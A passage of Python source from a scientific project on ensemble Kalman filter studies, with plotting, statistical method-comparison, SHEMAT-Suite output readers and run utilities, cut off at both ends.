'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p'],
coleros=[(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0)],
markersize=[10 for i in range(32)],
markeredgesize=1.5,
fontleg=30,
fonttit=40,
fontlab=40,
fonttic=30,
):
"""
A plotting function for statistics of residual distributions.
Parameters
----------
ax : Axes
The axes to draw to.
which_methods : array int
Array of integers containing the method specifiers
from module plotarrays.
The methods appear in the plot in this order.
which_res : string
'endres' - use residuals after EnKF run
'begres' - use residuals before EnKF run
stat_method : string
'mean' - Means
'std' - Standard deviation
'stdm' - Standard deviation of the mean
'median' - Median or 50 Percentile
'q25' - 25 Percentile
'q75' - 75 Percentile
ensemble_sizes : array of integers
array can typically contain 50, 70, 100, 250,
500, 1000, 2000
model : string
'wavebc' - Model wavebc
'wave' - Model wave
is_std : boolean
True - Show errorbars of standard deviation
False - No errorbars
std_method : string
Standard deviation to use
'std' - Standard deviation
'stdm' - Standard deviation of mean
pic_format : string
Format of the picture
'pdf' - pdf-format
'eps' - eps-format
'png' - png-format
'jpg' - jpg-format
'svg' - svg-format
figpos : array of floats
Four numbers
xbeg, ybeg, xrange, yrange
More input specifying plot parameters.
Returns
-------
ax : Axes
Axes containing plot.
pic_name : string
Containing proposed saving location for Figure.
"""
# Check
for enssize in ensemble_sizes:
if enssize not in [50, 70, 100, 250, 500, 1000, 2000]:
raise RuntimeError(
'Wrong ensemble size.'
)
# Title
ax.set_title(axistitle, size=fonttit)
# Number of methods
num_methods = len(which_methods)
# Default legend input
if legend_input is None:
legend_input = pa.longnames_methods
legend_input = np.array([legend_input[i].ljust(18)
for i in which_methods])
# Load residuals
res = np.load(pm.py_output_filename(
'errorplot',
which_res,
stat_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
'npy'
))
# Load standard deviation
if is_std:
std = np.load(pm.py_output_filename(
'errorplot',
which_res,
std_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
'npy'))
ax.set_prop_cycle("color", ['k'])
ax.set_position(figpos)
for iens, enssize in enumerate(ensemble_sizes):
# x positions, up to 15 methods
x = np.delete(np.arange(0, 100),
np.arange(0, 100, num_pack+1))
# Skip one after num_pack+1 entries for vertical line
resplot = res[:, iens]
if is_std:
stdplot = std[:, iens]
# Plot
puntos = [] # Contains plotted points
ax.plot(x[:len(resplot)], resplot, 'k-', label=3)
for iplot in range(num_methods):
# Points
punto, = ax.plot(
x[iplot],
resplot[iplot],
formatsos[iplot],
lw=2,
ms=markersize[iplot],
label=legend_input[iplot],
c=coleros[iplot], mew=markeredgesize,
mec='black'
)
puntos.append(punto)
# Text
if iplot == num_methods-1:
ax.text(
x[iplot]+xdiff_nens,
resplot[iplot] if is_textpos_auto else textpos[iens],
r'$n_{e}$='+str(enssize),
verticalalignment='center',
horizontalalignment='left',
size=20,
)
# Error
if is_std:
ax.errorbar(
x[iplot],
resplot[iplot],
yerr=stdplot[iplot],
fmt=formatsos[iplot],
lw=2,
ms=markersize[iplot],
label='this',
mfc=coleros[iplot],
mew=markeredgesize,
mec='black'
)
# Legend
num_inleg = num_pack # Methods per legend (except last)
num_legs = int(num_methods/num_inleg
+ int(bool(np.mod(num_methods,
num_inleg)))) # Number of legends
num_inlastleg = (np.mod(num_methods, num_inleg)
if np.mod(num_methods, num_inleg) else
num_inleg) # Methods in last legend
leginds = [num_inleg-1+i*num_inleg
if i < num_legs-1 else
num_inleg-1+(i-1)*num_inleg+num_inlastleg
for i in range(num_legs)] # last method ind in each legend
legranges = [num_inleg if i < num_legs-1 else num_inlastleg
for i in range(num_legs)] # Methods in each legend
for ileg in range(num_legs):
xleg = figpos[0] + ileg*figpos[2]/num_legs
my_legend = ax.legend(
handles=[puntos[i]
for i in range(leginds[ileg]-legranges[ileg]+1,
leginds[ileg]+1)],
bbox_to_anchor=[xleg,
0.00,
figpos[2]/num_legs,
0.3],
bbox_transform=plt.gcf().transFigure,
# loc=[0.0, 1.0],
mode='expand',
# labelspacing=1.0,
ncol=1,
numpoints=1,
fontsize=fontleg,
framealpha=1.0,
markerscale=1.0
)
ax.add_artist(my_legend)
# Lines
for xline in range(0, 100, num_pack+1):
ax.vlines(xline, 0.0, 1.0, linestyles='dotted')
for yline in yticks:
ax.hlines(yline, 0, 100, linestyles='dotted')
ax.hlines(lineyval, 0, 100, linestyles='dashed')
# Text: Model name and n_syn in box
if is_text:
model_spec = ' Tracer ' if model == 'wavereal' else ' Well '
ax.text(
text_x, text_y,
model_spec+'\n'
+ r' $n_{syn}$: '+str(n_syn).rjust(4),
linespacing=1.5,
fontsize=30,
bbox={'facecolor': (0.8, 0.8, 0.8), 'alpha': 1.0, 'pad': 10},
)
# Style
ax.set_xlim([xlim_min, (num_legs*(num_pack+1) if xlim_max is None
else xlim_max)])
ax.set_ylabel(ylabel,
fontsize=fontlab,
labelpad=10)
ax.tick_params(direction='in', length=6,
width=1, labelsize=fonttic,
top=False, right=False, bottom=False,
pad=8)
ax.set_xticks([])
ax.set_yticks(yticks)
ax.get_xaxis().set_visible(False)
ax.set_ylim(ylims)
# Saving location
pic_name = pm.py_output_filename(
ea.tag,
which_res,
stat_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
pic_format
)
return ax, pic_name
###############################################################################
# Matrix plot of RMSE quotients #
###############################################################################
def quots(
ax,
which_methods=[0, 1, 2, 3, 4, 5, 6],
which_res='endres',
stat_method='mean',
model='wavebc',
ensemble_sizes=[50, 70, 100, 250],
ensemble_size=50,
pic_format='pdf',
is_text=False,
axistitle='',
fonttit=40,
figpos=[0.32, 0.2, 0.6, 0.8],
ticksize=20,
):
"""
A function plotting a grid of quotients of
statistical measures.
Parameters
----------
ax : Axes
The axes to draw to.
which_methods : array int
Array of integers containing the method specifiers
from module plotarrays.
The methods appear in the plot in this order.
which_res : string
'endres' - use residuals after EnKF run
'begres' - use residuals before EnKF run
stat_method : string
'mean' - Means
'std' - Standard deviation
'stdm' - Standard deviation of the mean
'median' - Median or 50 Percentile
'q25' - 25 Percentile
'q75' - 75 Percentile
model : string
'wavebc' - Model wavebc
'wave' - Model wave
ensemble_sizes : array of integers
array can typically contain 50, 70, 100, 250,
500, 1000, 2000
ensemble_size : integer
Ensemble size of the job. Possibilities: 50,
70, 100, 250, 500, 1000, 2000
pic_format : string
Format of the picture
'pdf' - pdf-format
'eps' - eps-format
'png' - png-format
'jpg' - jpg-format
'svg' - svg-format
figpos : array of floats
Four numbers
xbeg, ybeg, xrange, yrange
More input specifying plot parameters.
Returns
-------
ax : Axes
Axes containing quotient matrix.
pic_name : string
Containing proposed saving location for Figure.
"""
# Check
if ensemble_size not in [50, 70, 100, 250, 500, 1000, 2000]:
raise RuntimeError('ensemble_size wrong')
# Title
ax.set_title(axistitle, size=fonttit)
# Number of compared methods
num_methods = len(which_methods)
# Ensemble size translated to index
iens = pa.indens[model][ensemble_size]
# Load residuals
res = np.load(pm.py_output_filename(
'errorplot',
which_res,
stat_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
'npy'))
# Calculate and sort quots
quots = np.array(
[[res[i1, iens]/res[i2, iens] for i1 in range(num_methods)]
for i2 in range(num_methods)]
)
ax.set_position(figpos)
# White Rectangles
for ipm in range(num_methods):
for jpm in range(num_methods):
# Diagonal black
if ipm == jpm:
quots[ipm, jpm] = 0.0
# Upper triangle white
if ipm < jpm:
quots[ipm, jpm] = None
ax.imshow(
quots,
interpolation='nearest',
cmap='Greys_r',
norm=colors.Normalize(vmin=0.8, vmax=1.0, clip=False)
)
# Plot: Mostly ticks
ax.set_xticks([i for i in range(num_methods)])
ax.set_xticklabels([pa.names_methods[which_methods[i]]
for i in range(len(which_methods))],
fontsize=ticksize,
rotation=90)
ax.set_yticks([i for i in range(num_methods)])
ax.set_yticklabels([pa.names_methods[which_methods[i]]
for i in range(len(which_methods))],
fontsize=ticksize)
ax.tick_params(length=0)
ax.set_frame_on(False)
# Text
for itext in range(num_methods):
for jtext in range(num_methods):
if itext < jtext:
ntext = quots[jtext, itext]
ttext = str(ntext)[0:4]
px = itext-0.35
py = jtext+0.15
colero = 'white' if ntext < 0.9 else 'black'
ax.text(px, py, ttext, color=colero, fontsize=25)
# Text: n_syn and ensemble_size
if is_text:
model_spec = ' Tracer ' if model == 'wavereal' else ' Well '
ax.text(
3.5, 1.5,
model_spec+'\n'
+ r' $n_{e}$: '+str(ensemble_size).rjust(4),
linespacing=1.5,
fontsize=30,
bbox={'facecolor': 'grey', 'alpha': 0.5, 'pad': 10},
)
# Saving location
pic_name = pm.py_output_filename(
ea.tag,
'quots_'+which_res,
stat_method+'_'+model+'_'
+ str(ensemble_size)+'_'
+ '_'.join([str(i) for i in which_methods]),
pic_format)
return ax, pic_name
```
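For orientation, a sketch of how `plot()` and `quots()` might be driven; the chosen method indices and the presence of the precomputed residual `.npy` files are assumptions:

```python
# Hypothetical driver (assumes the residual .npy files already exist).
import matplotlib.pyplot as plt

fig, ax = plt.subplots(figsize=(16, 10))
ax, pic_name = plot(ax, which_methods=[0, 1, 2, 3], ensemble_sizes=[50, 100])
fig.savefig(pic_name)

fig2, ax2 = plt.subplots(figsize=(10, 10))
ax2, pic_name2 = quots(ax2, which_methods=[0, 1, 2, 3],
                       ensemble_sizes=[50, 100], ensemble_size=50)
fig2.savefig(pic_name2)
```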
#### File: scripts/forward/read.py
```python
from pskf.tools.plot import specs as sc
from pskf.tools.plot import plotfunctions as pf
from pskf.tools.run import runmodule as rm
from pskf.tools.run import pythonmodule as pm
from pskf.scripts.forward import arrays as fa
def read(
model_name,
dat,
let,
fdir=None,
fname=None,
varname='uindex',
nt=0,
):
"""
Reading variable array from SHEMAT-Suite vtk-file.
Parameters
----------
model_name : string
String of model name.
dat : string
String with date of model run.
let : string
String of letter of model run.
varname : string
Variable name for array to be read.
Possibilities: 'uindex' 'head','temp','kz', 'v'
    nt : integer
        Number of the time step output.
Returns
-------
numpy_array : array
Array containing the variable array
numpy_array_name : string
Containing proposed saving location for Array.
"""
# Dirs
if fdir is None:
# samples_output_dir
fdir = rm.make_output_dirs(model_name, dat, let)[1]
if fname is None:
# time_out_file
fname = rm.make_file_dir_names(model_name, nt)[17]
# Get filetype ############################################################
if fname[-3:] == 'vtk':
ftype = 'vtk'
elif fname[-2:] == 'h5' or fname[-3:] == 'hdf':
ftype = 'hdf'
else:
print(fname)
raise RuntimeError('Wrong filetype.')
# Get reader ##############################################################
if ftype == 'vtk':
reader = pf.my_vtk(fdir, fname, varname)
elif ftype == 'hdf':
reader = pf.my_hdf(fdir+'/'+fname, varname)
# Numpy Array ############################################################
if ftype == 'vtk':
numpy_array = pf.my_vtk_to_numpy(reader)
elif ftype == 'hdf':
numpy_array = reader
# Numpy Array Name ########################################################
numpy_array_name = pm.py_output_filename(
fa.tag,
varname,
sc.specl(model_name, dat, let)+'_'+str(nt),
"npy",
)
return numpy_array, numpy_array_name
```
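A sketch of the intended call pattern; the model name, date and letter strings are placeholders, and the call assumes the corresponding SHEMAT-Suite output directory exists:

```python
# Hypothetical usage (identifiers are placeholders).
import numpy as np

numpy_array, numpy_array_name = read(
    'wavebc', '2018_01_01', 'a', varname='temp', nt=10)
np.save(numpy_array_name, numpy_array)  # save at the proposed location
```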
#### File: scripts/gaussianity/plot.py
```python
from scipy.stats import norm  # matplotlib.mlab.normpdf was removed in matplotlib 3.1
import numpy as np
from pskf.tools.run import pythonmodule as pm
from pskf.scripts.gaussianity import arrays as ga
def hist(
ax,
model_name='wavebc',
which_method=0,
ensemble_size=50,
n_syn=10,
n_comparisons=1000,
which_res='endres',
n_bins=100,
# std_method='std',
pic_format='pdf',
# figpos=[0.15,0.3,0.8,0.6], #xbeg, ybeg, xrange, yrange
xlims=None,
histlims=None,
title=None,
titley=1.05,
is_plot=False,
xlabel=None,
ylabel=None,
# ylims=[0.28,0.82],
is_xticks=True,
is_yticks=True,
itickhide=10,
# num_pack=4, # Number of methods in pack
# formatsos=['o','v','s','p','o','v','s','p'],
# coleros=[(0.0,0.0,0.0),(0.0,0.0,0.0),(0.0,0.0,0.0),(0.0,0.0,0.0),
# (1.0,1.0,1.0),(1.0,1.0,1.0),(1.0,1.0,1.0),(1.0,1.0,1.0)],
# markersize=10,
# markeredgesize=1.5,
# fontleg=30, #18
fonttit=30,
fontaxl=30,
fonttic=10,
):
"""
A histogramming function for means of random subsets
of given size.
Parameters
----------
ax : Axes
The axes to draw to.
model_name : string
String of model name.
'wavebc' - Model wavebc
'wavereal' - Model wavereal
'wavewell' - Model wavewell
'wave' - Model wave
which_method : int
Integer containing the method specifier
from module plotarrays.
ensemble_size : integer
Ensemble size of the job. Possibilities: 50,
70, 100, 250, 500, 1000, 2000
n_syn : integer
Number of synthetic studies in subset for mean calculation.
n_comparisons : integer
Number of means calculated.
which_res : string
'endres' - use residuals after EnKF run
'begres' - use residuals before EnKF run
n_bins : integer
Number of bins of histogram
pic_format : string
Format of the picture
'pdf' - pdf-format
'eps' - eps-format
'png' - png-format
'jpg' - jpg-format
'svg' - svg-format
Returns
-------
ax : Axes
Axes containing histogram.
pic_name : string
Containing proposed saving location for Figure.
"""
# Load means
arr = np.load(pm.py_output_filename(
ga.tag,
'meanarray_'+which_res,
model_name+'_'+str(ensemble_size)+'_'+str(n_syn)
+ '_'+str(n_comparisons)+'_'+str(which_method),
'npy'))
# Histogram
n, bins, patches = ax.hist(
arr,
n_bins,
color='grey',
range=histlims,
density=True,
stacked=True
)
ax.tick_params(labelsize=fonttic)
if xlims:
ax.set_xlim(xlims)
if title:
ax.set_title(title, size=fonttit, y=titley)
if not is_xticks:
ax.set_xticklabels([])
else:
for label in ax.xaxis.get_ticklabels()[::itickhide]:
label.set_visible(False)
if not is_yticks:
ax.set_yticklabels([])
else:
for label in ax.yaxis.get_ticklabels()[::itickhide]:
label.set_visible(False)
if xlabel:
ax.set_xlabel(xlabel, size=fontaxl)
if ylabel:
ax.set_ylabel(ylabel, size=fontaxl)
if is_plot:
# add a 'best fit' line
        y = norm.pdf(bins, np.mean(arr), np.std(arr))
ax.plot(bins, y, '--', lw=1, color="k")
# Saving location
pic_name = pm.py_output_filename(
ga.tag,
'meanarray_'+which_res,
model_name+'_'+str(ensemble_size)+'_'+str(n_syn)
+ '_'+str(n_comparisons)+'_'+str(which_method),
pic_format
)
return ax, pic_name
```
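The idea behind `hist()` can be demonstrated without the pskf file layout: the distribution of subset means tightens around the full-sample mean as `n_syn` grows. A self-contained sketch with synthetic residuals (all numbers made up):

```python
# Stand-alone illustration of subset-mean histograms (synthetic residuals).
import numpy as np
import matplotlib.pyplot as plt

rng = np.random.default_rng(0)
residuals = rng.lognormal(mean=-0.8, sigma=0.3, size=1000)  # fake study residuals

n_syn, n_comparisons = 10, 1000
means = np.array([rng.choice(residuals, n_syn, replace=False).mean()
                  for _ in range(n_comparisons)])

fig, ax = plt.subplots()
ax.hist(means, bins=100, color='grey', density=True)
fig.savefig('subset_means.png')
```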
#### File: scripts/monitor/read.py
```python
import os
import numpy as np
from pskf.tools.plot import specs as sc
from pskf.tools.run import runmodule as rm
from pskf.tools.run import pythonmodule as pm
from pskf.scripts.monitor import arrays as ma
def read(
model_name,
dat,
let,
fdir=None,
fname=None,
varname='uindex',
num_mon=1,
):
"""
Reading monitor arrays from SHEMAT-Suite.
Parameters
----------
model_name : string
String of model name.
dat : string
String with date of model run.
let : string
String of letter of model run.
varname : string
Variable name for array to be read.
Possibilities: 'uindex' 'head','temp','kz', 'v'
num_mon : integer
Number for monitoring point.
IMPORTANT: num_mon = 0 corresponds to the first
monitoring point in SHEMAT monitor file.
General: num_mon = i corresponds to monitoring
point i+1
Returns
-------
numpy_array : array
Array containing the monitor variable array
numpy_array_name : string
Containing proposed saving location for Array.
"""
# Dirs
if fdir is None:
# samples_output_dir
fdir = rm.make_output_dirs(model_name, dat, let)[1]
if fname is None:
# monitor_file
fname = rm.make_file_dir_names(model_name)[16]
# Read from monitor file ##################################################
numpy_array = np.genfromtxt(fdir+'/'+fname,
dtype='f8',
comments='%',
usecols=(ma.varpos[varname]),
)
# Reshape #################################################################
num_mons = sc.num_mons(model_name, dat, let)
if np.remainder(len(numpy_array), num_mons):
raise RuntimeError('Problem with num_mons')
    numpy_array = numpy_array.reshape(len(numpy_array) // num_mons, num_mons)
numpy_array = numpy_array[:, num_mon]
# Numpy Array Name ########################################################
numpy_array_name = pm.py_output_filename(
ma.tag,
varname,
sc.specl(model_name, dat, let)+'_'+str(num_mon),
"npy"
)
return numpy_array, numpy_array_name
def read_all(
fdir,
fname,
infdir,
infname,
varname='uindex',
num_mon=1,
):
"""
Reading general monitor files from SHEMAT-Suite.
Parameters
----------
fdir : string
String of directory of monitor file
fname : string
String of name of monitor file
infdir : string
String of directory of SHEMAT-Suite input file
infname : string
String of name of SHEMAT-Suite input file
varname : string
Variable name for array to be read.
Possibilities: 'uindex' 'head','temp','kz', 'v'
num_mon : integer
Number for monitoring point.
IMPORTANT: num_mon = 0 corresponds to the first
monitoring point in SHEMAT monitor file.
General: num_mon = i corresponds to monitoring
point i+1
Returns
-------
numpy_array : array
Array containing the monitor variable array
"""
# Read from monitor file ##################################################
numpy_array = np.genfromtxt(fdir+'/'+fname,
dtype='f8',
comments='%',
usecols=(ma.varpos[varname]),
)
# Reshape #################################################################
num_mons = sc.num_mons_all(infdir, infname)
if np.remainder(len(numpy_array), num_mons):
raise RuntimeError('Problem with num_mons')
numpy_array = numpy_array.reshape(int(len(numpy_array)/num_mons), num_mons)
numpy_array = numpy_array[:, num_mon]
return numpy_array
def mean(
model_name,
dat,
let,
varname='uindex',
mons=[0, 1],
):
"""
Computing mean monitor arrays from certain monitoring points.
Parameters
----------
model_name : string
String of model name.
dat : string
String with date of model run.
let : string
String of letter of model run.
varname : string
Variable name for array to be read.
Possibilities: 'uindex' 'head','temp','kz', 'v'
mons : array of integers
Numbers for monitoring points for mean.
IMPORTANT: num_mon = 0 corresponds to the first
monitoring point in SHEMAT monitor file.
General: num_mon = i corresponds to monitoring
point i+1
Returns
-------
mean_array : array
Array containing the mean monitor variable array
mean_array_name : string
Containing proposed saving location for Array.
"""
for imon, num_mon in enumerate(mons):
# File name
filename = pm.py_output_filename(
ma.tag,
varname,
sc.specl(model_name, dat, let)+'_'+str(num_mon),
"npy")
# Check existence
if not os.path.isfile(filename):
raise RuntimeError(
'Monitoring numpy-file does not exist: '
+ filename)
# Load filename
if imon == 0:
mean_array = np.load(filename)
else:
mean_array = mean_array + np.load(filename)
if imon == len(mons)-1:
            mean_array = mean_array / float(len(mons))  # np.float is removed in newer numpy
# Mean array name
mean_array_name = pm.py_output_filename(
ma.tag,
varname,
sc.specl(model_name, dat, let)+'_'
+ 'mean'+'_'
+ '_'.join([str(i) for i in mons]),
"npy"
)
return mean_array, mean_array_name
```
#### File: scripts/numcomp/read.py
```python
import numpy as np
import scipy as sp
from scipy import special, stats  # import special explicitly; 'import scipy' alone does not guarantee sp.special
from pskf.tools.plot import plotarrays as pa
from pskf.tools.run import pythonmodule as pm
from pskf.scripts.numcomp import arrays as na
def read(
which_methods,
which_res='endres',
model='wavebc',
ensemble_sizes=[50, 70, 100, 250],
method='ttest',
ensemble_size=50,
n_syn=1,
n_comparisons=10000,
cl=0.95,
pval=0.05,
):
"""
Reads residual arrays at beginning (begres) or
end (endres) of the EnKF run and calculates
probability arrays which method is better,
worse, or if they are even.
Parameters
----------
which_methods : array int
Array of integers containing the method specifiers
from module plotarrays.
which_res : string
'endres' - use residuals after EnKF run
'begres' - use residuals before EnKF run
model : string
'wavebc' - Model wavebc
'wave' - Model wave
ensemble_sizes : array of integers
array can typically contain 50, 70, 100, 250,
500, 1000, 2000
method : string
Which method to use for statistical comparison
of the subset. If n_syn == 1, the comparison
always defaults to comparing the residuals.
'ttest' - Use the T-Test, testing if the
two samples belong to the same
Gaussian distribution.
'gauss' - Calculate Gaussian distribution
of the difference and calculate
its probability to be larger
than zero.
'meanc' - Calculate the means and compare.
ensemble_size : integer
Ensemble size of the job. Possibilities: 50,
70, 100, 250, 500, 1000, 2000
n_syn : integer
Number of synthetic studies in subset.
n_comparisons : integer
Number of comparisons calculated.
cl : float
Confidence level for 'gauss'. If the probability
weight of the distribution of the difference between
two methods is larger than cl on one side of zero,
then the method with the smaller RMSE is considered
to have performed better.
pval : float
If the p-value from the T-Test is smaller than pval
the Test is considered to be negative, thus a
significant difference between the distributions is
assumed, making the method with the smaller RMSE
performing significantly better.
Returns
-------
probs : array
Array containing the probabilities.
probs_name : string
Containing proposed saving location for array.
"""
# Checks
if model not in ['wavebc', 'wave', 'wavewell', 'wavereal']:
raise RuntimeError('model wrong')
if method not in ['ttest', 'gauss', 'meanc']:
raise RuntimeError('method wrong')
if ensemble_size in [50, 70, 100, 250]:
if n_syn > 1000:
raise RuntimeError('n_syn wrong')
elif ensemble_size in [500, 1000, 2000]:
if n_syn > 100:
raise RuntimeError('n_syn wrong')
else:
raise RuntimeError('ensemble size wrong')
# Maximum Number of runs
max_n_runs = 0
for i_method in which_methods:
max_n_runs = np.max([pa.nums[model][i_method][ensemble_size],
max_n_runs])
# Load final residuals
res = np.zeros([len(which_methods), max_n_runs])
for i, i_method in enumerate(which_methods):
res_name = pm.py_output_filename(
'dists',
which_res,
model+'_'+pa.dats[model][i_method][ensemble_size]
+ '_'+pa.lets[model][i_method][ensemble_size],
'npy')
res[i, 0:pa.nums[model][i_method][ensemble_size]] = np.load(res_name)
# Initialize probs array
probs = np.zeros([len(which_methods), len(which_methods), 3])
# DOCUMENTATION:
# -------------------------------------------------
# probs[i, j, 0] : Probability that method i is better
# probs[i, j, 1] : Probability that methods are equal
# probs[i, j, 2] : Probability that method j is better
for ii, ri in enumerate(which_methods):
for ij, rj in enumerate(which_methods):
# Every pair only once (symmetry)
            if ij < ii:
continue
# Residual arrays for each method
resi = res[ii, 0:pa.nums[model][ri][ensemble_size]]
resj = res[ij, 0:pa.nums[model][rj][ensemble_size]]
            # n_syn covers the full set of available studies for both methods
            if (n_syn >= pa.nums[model][ri][ensemble_size]
                    and n_syn >= pa.nums[model][rj][ensemble_size]):
if not n_comparisons == 1:
raise RuntimeError(
'Set n_comparisons to 1 if n_syn equal'
+ ' to full number of available studies')
ni = 0 # ...i better
ne = 0 # ...equal
nj = 0 # ...j better
# Iterate number of comparisons
for i in range(n_comparisons):
# Subset of random order
isi = np.random.permutation(
np.arange(pa.nums[model][ri][ensemble_size])
)[0:n_syn]
isj = np.random.permutation(
np.arange(pa.nums[model][rj][ensemble_size])
)[0:n_syn]
resmixi = resi[isi]
resmixj = resj[isj]
# Single run
if n_syn == 1:
if resmixi[0] < resmixj[0]:
ni = ni + 1
elif resmixi[0] > resmixj[0]:
nj = nj + 1
else: # Equality happens
ne = ne + 1
# Mean comparison
elif method == "meanc":
if np.mean(resmixi) < np.mean(resmixj):
ni = ni + 1
elif np.mean(resmixi) > np.mean(resmixj):
nj = nj + 1
else: # Equality happens
ne = ne + 1
# T-Test
elif method == "ttest":
tv, pv = stats.ttest_ind(resmixi,
resmixj,
equal_var=False)
if pv < pval: # Significant difference
if tv < 0:
ni = ni+1
else:
nj = nj+1
else: # No significant difference
ne = ne+1
# Gaussian difference
elif method == "gauss":
# Means
mi = np.mean(resmixi)
mj = np.mean(resmixj)
# Mean Standard deviations
si = np.std(resmixi)/np.sqrt(resmixi.size)
sj = np.std(resmixj)/np.sqrt(resmixj.size)
# Mean difference and stdev of mean difference
m = mj-mi
s = np.sqrt(si*si + sj*sj)
# Probability bigger than zero
                    pcl = 0.5 + 0.5*special.erf(m/(s*np.sqrt(2)))
if pcl > cl: # i better
ni = ni + 1
elif pcl < 1-cl: # j better
nj = nj + 1
else: # No significant difference
ne = ne+1
# Output probabilities
pi = float(ni)/float(ni+ne+nj) # i better
pe = float(ne)/float(ni+ne+nj) # equal
pj = float(nj)/float(ni+ne+nj) # j better
probs[ii, ij, 0] = pi
probs[ii, ij, 1] = pe
probs[ii, ij, 2] = pj
probs[ij, ii, 0] = pj
probs[ij, ii, 1] = pe
probs[ij, ii, 2] = pi
probs_name = pm.py_output_filename(
na.tag,
'probs_'+which_res,
model+'_'+method+'_'+str(ensemble_size)+'_'
+ str(n_syn)+'_'+str(n_comparisons)+'_'
+ '_'.join([str(i) for i in which_methods]),
'npy')
return probs, probs_name
```
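The 'gauss' branch above reduces to a closed-form probability that the difference of means is positive. A small stand-alone check of that arithmetic with made-up residual samples:

```python
# Stand-alone check of the 'gauss' comparison arithmetic (made-up samples).
import numpy as np
from scipy import special

resmixi = np.array([0.40, 0.42, 0.45, 0.41])
resmixj = np.array([0.50, 0.52, 0.49, 0.55])

mi, mj = np.mean(resmixi), np.mean(resmixj)
si = np.std(resmixi) / np.sqrt(resmixi.size)
sj = np.std(resmixj) / np.sqrt(resmixj.size)

m = mj - mi                        # positive when method i has the smaller RMSE
s = np.sqrt(si * si + sj * sj)
pcl = 0.5 + 0.5 * special.erf(m / (s * np.sqrt(2)))  # P(difference > 0)
print(pcl)  # close to 1.0 here, so 'i better' at cl = 0.95
```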
#### File: tools/run/runmodule.py
```python
import subprocess
import os
import shlex
import string
import shutil
import numpy as np
import pskf.tools.run.pythonmodule as pm
#############################################################
# REPLACE STRING
#############################################################
def replace_string(file_name_input, old_str, new_str):
"In file_name_input every instance of old_str is replaced by new_str"
ostr_not_exist = 1
file_name_tmp = 'filename.tmp'
file_input = open(file_name_input, 'r')
file_tmp = open(file_name_tmp, 'w')
for line in file_input:
ostr_exist_check = line.find(old_str)
if (ostr_exist_check > -1):
ostr_not_exist = 0
file_tmp.write(line.replace(old_str, new_str))
file_input.close()
file_tmp.close()
os.remove(file_name_input)
os.rename(file_name_tmp, file_name_input)
if ostr_not_exist:
raise RuntimeError('String to be replaced: ' + old_str +
' not found in ' + file_name_input)
return
#############################################################
# MAKE TEMP COPY OF INPUTFILE
#############################################################
def make_tmp(file_name_input):
"Make a tmp file by adding .tmp at the end of the filename (input)."
file_input = open(file_name_input, 'r')
file_tmp = open(file_name_input + '.tmp', 'w')
for line in file_input:
file_tmp.write(line)
file_input.close()
file_tmp.close()
#############################################################
# RETURN THE INPUTFILE TO THE STATE OF THE TEMP COPY
#############################################################
def get_tmp(file_name_input):
"Copy the tmp file to the real one and then remove the tmp file."
file_input = open(file_name_input, 'w')
file_tmp = open(file_name_input + '.tmp', 'r')
for line in file_tmp:
file_input.write(line)
file_input.close()
file_tmp.close()
os.remove(file_name_input + '.tmp')
#############################################################
# GET INTEGER CORRESPONDING TO ALPHABET LETTER
#############################################################
def get_num_let(let):
"""
Returns the integer corresponding to the input letter
"""
alphabet = string.ascii_lowercase
if len(let) == 1:
return alphabet.index(let)
if len(let) == 2:
return 26 * (alphabet.index(let[0])) + alphabet.index(let[1]) + 26
if len(let) == 3:
return (26 * 26 * (alphabet.index(let[0])) + 26 *
(alphabet.index(let[1])) + alphabet.index(let[2]) + 26 * 26 +
26)
else:
raise RuntimeError('letter does not contain' + ' 1,2 or 3 letters')
#############################################################
# GET ALPHABET LETTER CORRESPONDING TO INTEGER
#############################################################
def get_let_num(num):
"""
Returns the letter of the alphabet corresponding to the input integer.
The form of the number is (ii are the indices of the letters in
string.ascii_lowercase, 0<= ii <=25):
Length1: i0
Length2: 26*i0 + i1 + 26
Length3: 26^2*i0 + 26*i1 + i2 + 26^2 + 26
"""
alphabet = string.ascii_lowercase
if num < 26:
return alphabet[num]
elif num < 702:
num = num - 26
return alphabet[num // 26] + get_let_num(num % 26)
elif num < 18278:
num = num - 26 * 26 - 26
return alphabet[num // 676] + get_let_num((num % 676) + 26)
else:
raise RuntimeError('Number too high: Should be < 18278')
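# Sanity sketch of the number<->letter bijection (illustrative, not part of the API):
#   get_num_let('a')  == 0        get_let_num(0)  == 'a'
#   get_num_let('aa') == 26       get_let_num(26) == 'aa'
#   get_num_let('ab') == 27       get_let_num(27) == 'ab'
# so get_let_num(get_num_let(let)) == let for 1- to 3-letter strings.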
#############################################################
# Run a script
#############################################################
def run_script(path, name, outfile=None, instr=None, wait=None, errout=None):
"""
Runs Scripts with optional output, input, waiting for it to end
and Error if execution went wrong.
"""
    # Note: subprocess.run always waits; 'wait' is kept for call compatibility.
    proc = subprocess.run(name, cwd=path, stdout=outfile, input=instr,
                          universal_newlines=True)
if errout:
proc.check_returncode()
# os.chdir(path)
# if not outfile:
# proc = subprocess.Popen(name, stdin=subprocess.PIPE)
# else:
